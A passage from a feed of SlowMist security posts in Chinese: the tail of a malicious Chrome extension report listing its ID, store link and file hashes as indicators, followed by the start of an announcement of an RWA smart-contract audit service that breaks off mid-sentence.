&#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">恶意扩展 ID：</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">ekjidonhjmneoompmjbjofpjmhklpjdd</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">恶意扩展商店页面：</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">https[:]//chromewebstore.google.com/detail/ekjidonhjmneoompmjbjofpjmhklpjdd</span></span></p></li></ul><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">恶意文件</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">恶意扩展</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">MD5: ce612d027e631d6633582227eb29002f</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">SHA1: 94d651b42355f2b0765a7435e5a5927623807225</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">SHA256: 6b4a4b64e6f969017cb3a9a71dd3038ddf32b989e5342dbbe36650d5802f2ee4</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">filename: index.html</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">SHA256: b84b89f0a1b7f00431274ac676104acaaa73d440e5731161d1077e733014cc29</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">filename: </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">27-a530a8c5aa9059e0.js</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">SHA256: 0cbf4f21cf157227d2c3fba80b64e1f4c3f9d2cc0bf926e024252c35e93edd5a</span></span></p></b></b></b></b></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="letter-spacing: 0.544px;font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: left;"><div style="display: inline-block;width: 657.014px;vertical-align: top;border-bottom: 1px dashed rgb(160, 160, 160);border-bottom-right-radius: 0px;border-right: 1px dashed rgb(160, 160, 160);border-top-right-radius: 0px;border-left-width: 0px;"><div powered-by="xiumi.us"><div style="padding-right: 10px;padding-left: 10px;display: inline-block;border-style: solid;border-width: 1px 0px 0px 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;border-color: rgb(54, 53, 53);border-radius: 0px;width: 629.769px;"><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">往期回顾</span></strong></span></p></div></div><div powered-by="xiumi.us"><div style="text-align: center;"><div style="padding: 10px 20px;display: inline-block;width: 656.019px;vertical-align: top;"><div style="margin-top: 8px;margin-bottom: 8px;"><div style="font-size: 14px;color: rgb(62, 62, 62);text-align: left;"><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504886&amp;idx=1&amp;sn=6327c2cd38ad036a84e468f938309eb4&amp;scene=21#wechat_redirect" textvalue="慢雾｜RWA 智能合约安全审计服务正式推出" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾｜RWA 智能合约安全审计服务正式推出</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504881&amp;idx=1&amp;sn=8c83bc9f82e684fdb75e04fade95913f&amp;scene=21#wechat_redirect" textvalue="Grok 被利用背后：AI Agent 权限链滥用分析" data-itemshowtype="0" linktype="text" data-linktype="2">Grok 被利用背后：AI Agent 权限链滥用分析</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504861&amp;idx=1&amp;sn=0f71a6b7fafe17ee9cd5e6cf07b83e41&amp;scene=21#wechat_redirect" textvalue="慢雾出品｜链接真实世界资产：从协议族解析到安全实践" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾出品｜链接真实世界资产：从协议族解析到安全实践</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504841&amp;idx=1&amp;sn=289fc7c20f2f00f8313ea5a5c378f90f&amp;scene=21#wechat_redirect" textvalue="慢雾 2026 香港 Web3 嘉年华之旅圆满收官!" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾 2026 香港 Web3 嘉年华之旅圆满收官!</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504768&amp;idx=1&amp;sn=4589da9b7bea88de8f7b4dbd5cbfd0c8&amp;scene=21#wechat_redirect" textvalue="Hacking Time 回顾：慢雾携手行业专家，深度拆解 AI &amp; Web3 的攻防新范式" data-itemshowtype="0" linktype="text" data-linktype="2">Hacking Time 回顾：慢雾携手行业专家，深度拆解 AI &amp; Web3 的攻防新范式</a></span></p></div></div></div></div></div></div></div></div></div></div><p style="white-space: normal;text-align: center;margin-bottom: 0px;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="3.9814814814814814" data-s="300,640" data-type="png" data-w="1080" style="letter-spacing: 0.578px;text-align: center;white-space: normal;width: 558px;pointer-events: initial;" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/8z8bibAexaCLqYqc9l9poJTcO8JBsibl6nSSJoiaasoqFToYClTV5oAl2oE6IcqhNsiciagmyhOAsRCrdxdrOKqxpZicVQqlu0WrcOb5vDfKMGsSc/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="558" data-cropsely2="2222" data-imgfileid="100021118" src="https://wechat2rss.xlab.app/img-proxy/?k=8009a386&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCLqYqc9l9poJTcO8JBsibl6nSSJoiaasoqFToYClTV5oAl2oE6IcqhNsiciagmyhOAsRCrdxdrOKqxpZicVQqlu0WrcOb5vDfKMGsSc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div powered-by="xiumi.us" style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: center;"><div style="padding: 10px;display: inline-block;width: 609.282px;border-width: 1px;border-style: solid;border-color: rgb(192, 200, 209);background-color: rgb(239, 239, 239);"><div><div style="font-size: 14px;line-height: 1.2;"><p><span style="color: rgb(0, 0, 0);"><strong><span style="font-size: 16px;"><span leaf="">慢雾导航</span></span></strong></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾科技官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://www.slowmist.com/" target="_blank">https://www.slowmist.com/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾区官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://slowmist.io/" target="_blank">https://slowmist.io/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾 GitHub</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://github.com/slowmist" target="_blank">https://github.com/slowmist</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Telegram</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.me/slowmistteam" target="_blank">https://t.me/slowmistteam</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Twitter</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://twitter.com/@slowmist_team" target="_blank">https://twitter.com/@slowmist_team</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Medium</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://medium.com/@slowmist" target="_blank">https://medium.com/@slowmist</a></span></span></em></span></p><p style="letter-spacing: 0.544px;"><span style="color: rgb(0, 0, 0);"><strong><span leaf="">知识星球</span></strong></span></p><p style="letter-spacing: 0.544px;"><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.zsxq.com/Q3zNvvF" target="_blank">https://t.zsxq.com/Q3zNvvF</a></span></span></em></span></p></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=c8594f06&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU4ODQ3NTM2OA%3D%3D%26mid%3D2247504920%26idx%3D2%26sn%3D476c39eb63c7323cc18604a3ccc5d487">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sat, 09 May 2026 18:46:00 +0800</pubDate>
    </item>
    <item>
      <title>慢雾｜RWA 智能合约安全审计服务正式推出</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504886&amp;idx=1&amp;sn=6327c2cd38ad036a84e468f938309eb4</link>
      <description>慢雾 RWA 智能合约安全审计服务现已推出，欢迎有需求的项目方及相关机构联系我们。</description>
      <content:encoded><![CDATA[<p><span>慢雾安全团队</span> <span>2026-05-07 18:51</span> <span style="display: inline-block;">中国香港</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=8c171caa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCJqLFxCFia2Wr0kMzrpxUPEU0KvzYXGsERQpZRte7nWRGAMV2HnK9zzribZzo6Hib7FHY7Rhxic210lKjrlPfLfrKf8UBA01x4iaEJE%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>慢雾 RWA 智能合约安全审计服务现已推出，欢迎有需求的项目方及相关机构联系我们。</p>
  <p><b data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><h2 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;color: rgb(0, 0, 0);font-weight: bold;">背景</span></span></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">RWA（Real World Asset，现实世界资产）正在成为 Web3 与传统金融深度融合的核心方向。债券、股权、房地产、设备、收益权等现实世界资产的链上映射，正在重塑数字资产生态的边界。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">与传统 DeFi 不同，RWA 协议的安全边界从&#34;代码安全&#34;延伸至&#34;权利确权、合规治理与链下执行&#34;。一次权限变更，可能对应的是资产冻结；一次强制转账，可能影响的是真实世界中的债权归属。</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">代码与法律之间的映射关系，使得 RWA 的安全审计已不再是单纯的技术问题，而是涵盖技术、合规与业务逻辑的复合命题。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">与此同时，全球监管机构也开始加速布局 RWA 赛道。无论是香港证监会(HKSFC) 对 STO 的合规要求，还是美国 SEC 对证券化代币的审查标准，监管合规正成为 RWA 项目进入市场的核心门槛。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">在这一背景下，慢雾安全团队正式推出 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">RWA 智能合约安全审计服务</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">，以系统化的方法论、完整的审计框架和丰富的实战经验，为 RWA 项目的安全落地提供全面保障。</span></span></p><h2 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;color: rgb(0, 0, 0);font-weight: bold;">RWA 协议形态与发展现状</span></span></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">RWA 赛道目前已形成多条主流协议路径，并在证券、房地产、实物资产、结构化收益等细分领域快速落地：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">证券 / 股权 / 债券型 RWA</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：参考 ERC-1400 (UniversalToken)、ERC-3643 (T-REX)、ERC-7518 等标准，融合 KYC/AML 白名单、合规转账控制、强制操作等机制；</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">房地产 / 不动产型 RWA</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：以 ERC-6065 为代表，在链上结构化存储房产地权、抵押负担、产权证号等信息；</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">实物 / 设备 / 商品批次型 RWA</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：以 ERC-4519、ERC-7765 为代表，将 NFT 与物理设备或实物权益绑定，实现链上兑换与注销流程；</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">收益权 / 结构化资产型 RWA</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：以 ERC-6960 (Dual Layer Token) 为代表，支持主资产 + 子资产的分层结构，映射分级收益权、优先/次级份额等复杂金融产品。</span></span></p></li></ul><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">然而，正是这种横跨链上与链下、代码与法律的复合属性，使 RWA 成为当前 Web3 安全领域最具挑战性的审计对象之一。</span></span></p><h2 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;color: rgb(0, 0, 0);font-weight: bold;">为什么 RWA 审计不同于普通 DeFi 审计?</span></span></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">从代码审计的视角，RWA 协议相较于普通 DeFi 存在三大核心差异：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">第一，资产本质不同：代码只是一层&#34;映射&#34;。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在纯链上协议里，合约状态通常就是资产的唯一事实来源。而在 RWA 中，智能合约管理的只是现实资产的&#34;索引&#34;和&#34;权利凭证&#34;，背后还有 